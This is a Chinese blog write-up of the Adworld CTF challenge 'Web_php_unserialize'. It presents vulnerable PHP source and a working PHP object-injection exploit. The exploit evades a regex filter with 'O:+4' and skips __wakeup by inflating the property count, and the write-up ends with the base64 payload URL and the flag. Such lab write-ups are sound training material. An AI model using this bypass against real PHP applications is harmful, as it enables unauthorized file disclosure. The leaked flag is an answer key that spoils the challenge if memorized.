攻防世界- Web_php_unserialize

32进制

已于 2022-10-28 20:41:45 修改

阅读量132

点赞数

分类专栏：攻防世界CTF web 文章标签：前端 php 开发语言

于 2022-10-23 21:55:32 首次发布

本文链接：https://blog.csdn.net/m0_47210241/article/details/127481915

版权

攻防世界CTF 同时被 2 个专栏收录

23 篇文章 0 订阅

订阅专栏

web

18 篇文章 1 订阅

订阅专栏

Web_php_unserialize

积分2金币2

175最佳Writeup由 mortals 提供WriteUP

反馈

难度：2

方向：Web

题解数：55

解出人数：11706

题目来源: CTF

题目描述: 暂无

题目场景:

http://61.147.171.105:60401

100%

倒计时: 3时49分17秒

延时删除场景

题目已回答正确

<?php 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
if (isset($_GET['var'])) { 
    $var = base64_decode($_GET['var']); 
    if (preg_match('/[oc]:\d+:/i', $var)) { 
        die('stop hacking!'); 
    } else {
        @unserialize($var); 
    } 
} else { 
    highlight_file("index.php"); 
} 
?>

<!-- http://61.147.171.105:60401/ -->

<?php 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
// if (isset($_GET['var'])) { 
//     $var = base64_decode($_GET['var']); 
//     if (preg_match('/[oc]:\d+:/i', $var)) { 
//         die('stop hacking!'); 
//     } else {
//         @unserialize($var); 
//     } 
// } else { 
//     highlight_file("index.php"); 
// } 

$obj=new Demo("fl4g.php");
$str=serialize($obj);
echo $str,PHP_EOL;
$str=str_replace('O:4','O:+4',$str);
$str=str_replace(':1:',':2:',$str);
echo $str;
echo base64_encode($str);
?>

                                                      
┌──(kwkl㉿kwkl)-[~/HODL]
└─$ cd adworld/web/unsel 
                                                      
┌──(kwkl㉿kwkl)-[~/HODL/adworld/web/unsel]
└─$ ls     
1.php
                                                      
┌──(kwkl㉿kwkl)-[~/HODL/adworld/web/unsel]
└─$ php 1.php 
<!-- http://61.147.171.105:60401/ -->

O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}
                                                      
┌──(kwkl㉿kwkl)-[~/HODL/adworld/web/unsel]
└─$ php 1.php
<!-- http://61.147.171.105:60401/ -->

O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}
O:+4:"Demo":2:{s:10:"Demofile";s:8:"fl4g.php";}TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

解答：

http://61.147.171.105:60401/?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

<?php
$flag="ctf{b17bd4c7-34c9-4526-8fa8-a0794a197013}";
?>